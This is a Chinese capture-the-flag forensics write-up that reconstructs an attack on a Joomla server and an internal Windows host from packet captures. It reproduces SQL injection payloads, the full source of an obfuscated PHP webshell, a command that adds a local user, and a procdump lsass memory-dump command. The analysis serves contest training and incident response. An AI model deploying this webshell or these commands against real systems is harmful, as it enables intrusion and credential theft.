前言

由于自己赛区的铁三比赛在最后一场,于是利用闲暇时间做了一下别的赛区的题目,这里给出5月5号比赛的数据赛做题记录

题目分享:

链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4

题目描述

1.黑客攻击的第一个受害主机的网卡IP地址

2.黑客对URL的哪一个参数实施了SQL注入

3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)

4.第一个受害主机网站数据库的名字

5.Joomla后台管理员的密码是多少

6.黑客第一次获得的php木马的密码是什么

7.黑客第二次上传php木马是什么时间

8.第二次上传的木马通过HTTP协议中的哪个头传递数据

9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)

10.php代理第一次被使用时最先连接了哪个IP地址

11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候

12.黑客在内网主机中添加的用户名和密码是多少

13.黑客从内网服务器中下载下来的文件名

第一个数据包

面对巨大的流量包,过滤格外重要,这里我们先过滤为http协议

可以看到202.1.1.2对192.168.1.8进行了疯狂的爆破

我们跟进一条数据,进行tcp流跟踪

GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(*'+(SELECT 'ZoHc' WHERE 1078=1078 OR (SELECT 2511 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(2511=2511,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))+' HTTP/1.1

Accept-Encoding: gzip,deflate

Host: 202.1.1.1:8000

Accept: */*

User-Agent: sqlmap/1.1.3.2#dev (http://sqlmap.org)

Connection: close

Cache-Control: no-cache

不难看出,黑客利用sqlmap在对目标站点进行不断的sql注入试探

可以确定无误,受害主机的网卡IP地址即为192.168.1.8

而注入的参数也可以清晰的看见,为list[select]

再根据回显内容

Status: 500 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '*'+(SELECT 'ZoHc' WHERE 1078=1078 OR (SELECT 2511 FROM(SELECT COUNT(*),CONCAT(0x' at line 1 SQL=SELECT (*'+(SELECT 'ZoHc' WHERE 1078=1078 OR (SELECT 2511 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(2511=2511,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))+',uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

目标站点数据库抛出的错误,可以清晰的看见

FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users

不难确定,目标站点的数据库表名前缀为ajtuc_

接着为了确定受害主机网站数据库的名字,我又进行了一次过滤

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http

此时挑选最后一次注入的payload进行解码

GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(UPDATEXML(6315,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),4235))

可以清楚的看到

FROM joomla.ajtuc_users

可以马上确定,数据库名为joomla

为快速寻找后台管理员密码,我进行了如下筛选

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http contains "password" && http.request.method==POST

但是并没有找到有效登录

随机我想在sql注入中寻找密码

ip.dst == 192.168.1.8 && http contains "password"

三条信息分别回显

Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq' SQL=SELECT (UPDATEXML(5928,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7096)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

Status: 500 XPATH syntax error: 'qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq' SQL=SELECT (UPDATEXML(3613,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),23,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),7939)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq' SQL=SELECT (UPDATEXML(8949,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),45,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),3079)),uc.name AS editor FROM `ajtuc_ucm_history` AS h LEFT JOIN ajtuc_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 1 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`

可以看到数据

qqzvq$2y$10$lXujU7XaUviJDigqqkkq

qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq

qqzvqzi/8B2QRD7qIlDJeqqkkq

我们观察sql构造,发现具有前缀和后缀

0x71717a7671

0x71716b6b71

解码后得到

qqzvq

qqkkq

我们去掉前缀和后缀,可以得到

$2y$10$lXujU7XaUviJDig

FMzKy6.wx7EMCBqpzrJdn7

zi/8B2QRD7qIlDJe

于是我们可以得到完整的加密密码

$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe

但是一直没有解密成功……有大师傅知道解法可以告诉我,thanks

第二个数据包

由于已确定目标ip,所以依旧使用以下过滤简化操作

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http

可以看到一个奇怪文件:

kkkaaa.php

我们跟进POST数据查看

不难发现,是中国菜刀的流量

小马密码为zzz

接着为确定黑客第二次上传php木马的时间

我进行了过滤,因为我猜想,黑客应该是根据第一个小马来上传的第二个小马

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http.request.method==POST

此时一条数据格外引人注目

我们对其16进制进行分析

将其保存为php文件

得到源码

$p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5';

$d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\w]>])[\w->]]+>](?:;q=>]0.([\d]))?,?/",>';

$W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base';

$e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>';

$E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("$d<>]/$k>">])>];@>]session_destr>]oy();}}}}';

$t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>';

$M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto';

$P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>';

$j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion');

$k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>';

$g='"";for(>]$i=>]0;$i])>]{for($j=0;($j<>]$c&&>]$i]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>';

$R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o=';

$Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>';

$v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]';

$x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);

$N=$j('',$x);$N();

?>

于是我立刻进行了解混淆

var_dump($j);

var_dump($x);

得到结果

string(15) "create_function"

string(929) "$kh="cb42";$kf="e130";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i$d$k>");@session_destroy();}}}}"

此时整个小马已经清晰可见

关注最后的调用

$N = create_function('',$x);

$N();

重点在于$x,我们对其进行美化和反混淆

function x($t, $k)

{

$c = strlen($k);

$l = strlen($t);

$o = "";

for ($i = 0; $i < $l;) {

for ($j = 0; $j < $c && $i < $l; $j++, $i++) {

$o .= $t[$i] ^ $k[$j];

}

}

return $o;

}

$rr = @$_SERVER["HTTP_REFERER"];

$ra = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];

if ($rr && $ra) {

$u = parse_url($rr);

parse_str($u["query"], $q);

$q = array_values($q);

preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);

if ($q && $m) {

@session_start();

$s =& $_SESSION;

$i = $m[1][0] . $m[1][1];

$h = strtolower(substr(md5($i . "cb42"), 0, 3));

$f = strtolower(substr(md5($i . "e130"), 0, 3));

$p = "";

for ($z = 1; $z < count($m[1]); $z++) {

$p .= $q[$m[2][$z]];

}

if (strpos($p, $h) === 0) {

$s[$i] = "";

$p = substr($p, 3);

}

if (array_key_exists($i, $s)) {

$s[$i] .= $p;

$e = strpos($s[$i], $f);

if ($e) {

$k = "cb42e130";

ob_start();

@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), substr($s[$i], 0, $e))), "cb42e130")));

$o = ob_get_contents();

ob_end_clean();

$d = base64_encode(x(gzcompress($o), "cb42e130"));

print "{$d}{$k}>";

@session_destroy();

}

}

}

}

故此可以100%确定此为第二个小马

上传时间为:17:20:44.248365

容易看到此时有两个与HTTP头有关的参数

$rr = @$_SERVER["HTTP_REFERER"];

$ra = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];

我们来确定一下数据传递部分,首先是确定小马名称

/var/www/html/joomla/tmp/footer.php

还是使用过滤

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http

然后可以看到许多请求footer.php的页面,点开一个查看详情

容易发现referer数据十分可疑,而ACCEPT_LANGUAGE较为正常

但是直接对referer进行bae64解密,显然是乱码

这里就与小马的特性有关了

@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), substr($s[$i], 0, $e))), "cb42e130")));

而referer传递的数据为

Referer: http://www.google.iq/url?sa=t&rct=j&source=web&cd=623&ved=yVf-hu8N5&ei=gcHI-OXfdeSh_r5Xd1USIw&usg=tbb8jNeT_-HithThst6Qgk5y43oMyJvSkt&sig2=VkRefVPlr8-KrYnxQ39aYE

而命令执行成功后的回显为

G/43MmUxMzE=

这里涉及加解密问题,本处就不做讨论,有兴趣的可以自行研究该小马

所以可以基本确定,木马通过HTTP协议中的Referer头传递数据

然后题目又抛出问题内网主机的mysql用户名和请求连接的密码hash是多少?

这里我选择过滤

tcp contains "mysql" && mysql

得到大量数据

可以发现黑客应该在对Mysql的登录进行爆破

内网受害机器为192.168.2.20

我们找到最后一条登录数据

此时应该可以基本确定,该值为我们需要的mysql密码hash了

答案为admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

阶段性梳理

这里可以基本确定下来这些问题的答案

1.黑客攻击的第一个受害主机的网卡IP地址

192.168.1.8

2.黑客对URL的哪一个参数实施了SQL注入

list[select]

3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)

ajtuc_

4.第一个受害主机网站数据库的名字

joomla

5.Joomla后台管理员的密码是多少

$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe(未解密)

6.黑客第一次获得的php木马的密码是什么

zzz

7.黑客第二次上传php木马是什么时间

17:20:44.248365

8.第二次上传的木马通过HTTP协议中的哪个头传递数据

Referer

9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)

admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

第四个数据包

我们简单过滤一下

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http

可以发现

目标机器已经被挂上了tunnel.php,方便外网对内网的访问

为方便查看黑客操作,我们过滤出POST请求

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http.request.method==POST && http

答案则一目了然

我们清晰的看见黑客的php代理第一次被使用时最先连接4.2.2.2这个ip

第九个数据包

为确定黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候,我们继续进行过滤

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "dir" || http contains "ls")

我们不难发现

此时一条为ls,一条为dir,我们先对ls的进行验证

追踪其tcp流

发现并没有执行成功

再对dir进行验证

于是可以确定无误,目标系统为windows,同时dir命令执行成功

时间为:18:37:38.482420

既然该192.168.2.20的机器可以执行命令,于是我改变过滤方式,查看黑客如何进行攻击

ip.addr == 192.168.2.20 && http

不难发现

后来黑客利用echo命令写入了一个名为sh.php的后门

我们进一步跟进黑客执行的指令,由于是中国菜刀流量,我们选择根据回显明文,猜测指令,这样更有效率

ip.src == 192.168.2.20 && http

在18:49:27.767754时间,我们发现一条可疑数据,判断黑客应该是执行了net user的命令

那么应该黑客是准备在内网主机中添加用户了,我们进一步观察这个时间点附近的数据

在18:50:09.344660时,我们发现可疑操作

这应该是黑客给某用户授予管理员权限的错误提示

发现指令

cd/d"C:phpStudyWWWb2evolutioninstalltest"&net user localgroup administrator star /add&echo [S]&cd&echo [E]

关键点

net user localgroup administrator star /add

然后在18:50:42.908737发现黑客再次执行了net user命令

此时回显为:

Administrator Guest

kaka star

看来黑客成功添加了管理员用户kaka

确定了大致的作案时间,我们即可使用过滤

ip.addr == 192.168.2.20 && http

根据之前的判断,我们可以知道

18:49:27.767754时,不存在kaka用户

18:50:42.908737时,kaka用户已成为管理员

所以可以断定作案时间点

在此期间,一共4个POST请求,我们挨个查看,果不其然,在第一个POST中就发现了问题

Y2QvZCJDOlxwaHBTdHVkeVxXV1dcYjJldm9sdXRpb25caW5zdGFsbFx0ZXN0XCImbmV0IHVzZXIg

a2FrYSBrYWthIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=

解码后

cd/d"C:phpStudyWWWb2evolutioninstalltest"&net user kaka kaka /add&echo [S]&cd&echo [E]

可以明显看到

net user kaka kaka /add

于是可以断定,用户名和密码均为kaka

然后解决最后一个问题:黑客从内网服务器中下载下来的文件名

既然是下载,应该是利用中国菜刀进行下载了,那我们只过滤出post流量,查看命令即可

ip.dst == 192.168.2.20 && http.request.method==POST

然后我们在数据包的最后发现如下数据

我们将其解码

cd/d"C:phpStudyWWWb2evolutioninstalltest"&procdump.exe -accepteula -ma lsass.exe&echo [S]&cd&echo [E]

发现使用了procdump.exe

同时发现文件

QzpccGhwU3R1ZHlcV1dXXGIyZXZvbHV0aW9uXGluc3RhbGxcdGVzdFxsc2Fzcy5leGVfMTgwMjA4

XzE4NTI0Ny5kbXA=

解码得到

C:phpStudyWWWb2evolutioninstalltestlsass.exe_180208_185247.dmp

最后我们可以确定,黑客下载了lsass.exe_180208_185247.dmp文件

答案总结

所以我们可以确定完整的答案为

1.黑客攻击的第一个受害主机的网卡IP地址

192.168.1.8

2.黑客对URL的哪一个参数实施了SQL注入

list[select]

3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)

ajtuc_

4.第一个受害主机网站数据库的名字

joomla

5.Joomla后台管理员的密码是多少

$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe(未解密)

6.黑客第一次获得的php木马的密码是什么

zzz

7.黑客第二次上传php木马是什么时间

17:20:44.248365

8.第二次上传的木马通过HTTP协议中的哪个头传递数据

Referer

9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)

admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

10.php代理第一次被使用时最先连接了哪个IP地址

4.2.2.2

11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候

18:37:38.482420

12.黑客在内网主机中添加的用户名和密码是多少

kaka:kaka

13.黑客从内网服务器中下载下来的文件名

lsass.exe_180208_185247.dmp

信息安全 数据赛 铁人三项_2018信息安全铁人三项数据赛题解相关推荐

  1. 信息安全 数据赛 铁人三项_信息安全铁人三项赛-赛事章程-信息安全铁人三项赛...

    赛事章程 竞赛总则 为贯彻<国务院关于大力推进大众创业万众创新若干政策措施的意见><国务院办公厅关于深化高等学校创新创业教育改革的实施意见>,落实中央网信办.国家发改委.教育部 ...

  2. 信息安全 数据赛 铁人三项_信息安全铁人三项赛线上资格赛完美收官

    ​​ 4月8日,由中国信息安全测评中心指导,中国信息产业商会信息安全产业分会主办.教育部高等学校信息安全专业教学指导委员会协办,中国信息安全产业商会信息安全产业分会人才建设专业委员会和北京西普阳光教育 ...

  3. 教育行业信息安全敲起警钟,迅软DSE致力守护教育数据信息安全

    一.寄锦教育简介 广州寄锦教育科技有限公司是一家致力于国家职业资格技能培训及学历教育培训,同时提供职业规划.就业指导.招聘求职等专项人才服务的教育培训机构,公司着力打造"最青春.最创意.最国 ...

  4. 计算机信息安全密码学研究,密码学是对信息安全各方面的研究,能够解决所有信息安全的问题。() - 试题答案网问答...

    相关题目与解析 密码学作为信息安全的关键技术,其安全目标主要包括三个非常重要的方面:保密性.完整性和可用性.()是指所有资源只能由授权方式以授权的方式进行修改,即信息未经授权不能进行改变的特性. 密码 ...

  5. 亚信安全与新华三联手打造“更安全”的云数据中心

    今日,新IT解决方案领导者新华三集团(简称新华三)与全球云与大数据安全领域领导者亚信安全联合宣布,双方将在产品创新.技术服务.渠道营销等领域展开全面的战略联盟合作,积极提升我国云计算应用安全管理水平, ...

  6. 关于数据科学,书上不曾提及的三点经验

     关于数据科学,书上不曾提及的三点经验 发表于2015-09-10 23:33| 445次阅读| 来源Mikio L. Braun Blog| 0 条评论| 作者Mikio L. Braun 大数 ...

  7. 有限服务器延时计算_新建三座超级数据中心,增超百万台服务器 阿里云数据中心选址有何逻辑?...

    每经记者:刘春山 每经编辑:梁枭 今日(7月31日),阿里云正式宣布,其位于南通.杭州和乌兰察布的三座超级数据中心正式落成,陆续开服,新增超100万台服务器的计算力.加上之前的张北.河源,阿里云已经建 ...

  8. 「数据游戏」:使用 ARIMA 算法预测三日后招商银行收盘价

    作者:天琼,「数据游戏」优胜队伍成员 介绍 本文整理记录了参与的一次小型数据分析竞赛「数据游戏」,竞赛目标是预测2019年5月15日A股闭市时招商银行600036的股价. 主要思路是利用ARIMA算法 ...

  9. 华为云FusionInsight连续三次获得第一,加速释放数据要素价值

    摘要:近日,IDC发布<中国大数据平台市场研究报告,2021 H1>,华为云FusionInsight智能数据湖已连续三次获得大数据平台市场份额第一. 本文分享自华为云社区<华为云F ...

最新文章

  1. oracle表空间最大30G?如果一张表超过30G怎么办
  2. Docker Hello World容器运行报错的解决办法
  3. dom4j-cookbook
  4. linux 基础训练题,Linux习题练习
  5. Java案例:生成指定目录下某种类型文件的列表
  6. SAP License:共享服务的今天和明天
  7. [转载] Python中对 Excel 的相关详细操作(读取、写入、指定行、指定列、新增sheet工作表)
  8. linux下架子网卡,Linux下新手装网卡指南
  9. CE修改器使用教程 [入门篇]
  10. 线性链表的建立与插入-----数据结构与算法笔记
  11. 服务器PCI插槽上的固态硬盘,固态硬盘常见接口图解
  12. 市场调研报告-钨铜合金材料市场现状及未来发展趋势
  13. 磁盘管逻辑卷(LVM)
  14. 字节跳动2019校招笔试题(后端开发)一
  15. ASP医院管理系统—病历管理系统的设计与实现
  16. 卖了个 Chrome 插件,赚了几千美金,但是很后悔!
  17. bzoj1202 [HNOI2005]狡猾的商人
  18. 毕业设计-基于机器视觉的数字静态手势的匹配识别-OpenCV
  19. 在windbg中测试shadow ssdt , win32k!NtUserGetForegroundWindow , hook shadow ssdt
  20. Tomcat 设置JVM内存大小

热门文章

  1. Open3D面向机器学习的扩展库
  2. GameMaker Studio从头开始学习设计和开发3款游戏
  3. 《DDIA》读书笔记
  4. ‘百度杯’十月场web ---login
  5. DotNet Core Console 程序使用NLog
  6. Mac OS X 下查看和设置JAVA_HOME
  7. mysql主从库配置ps:mysql5.6
  8. Android studio 获取每次编译apk时的日期
  9. tiny210V2 Uboot kernel filesystem 烧写和启动
  10. Android游戏开发基础part2--Canvas画布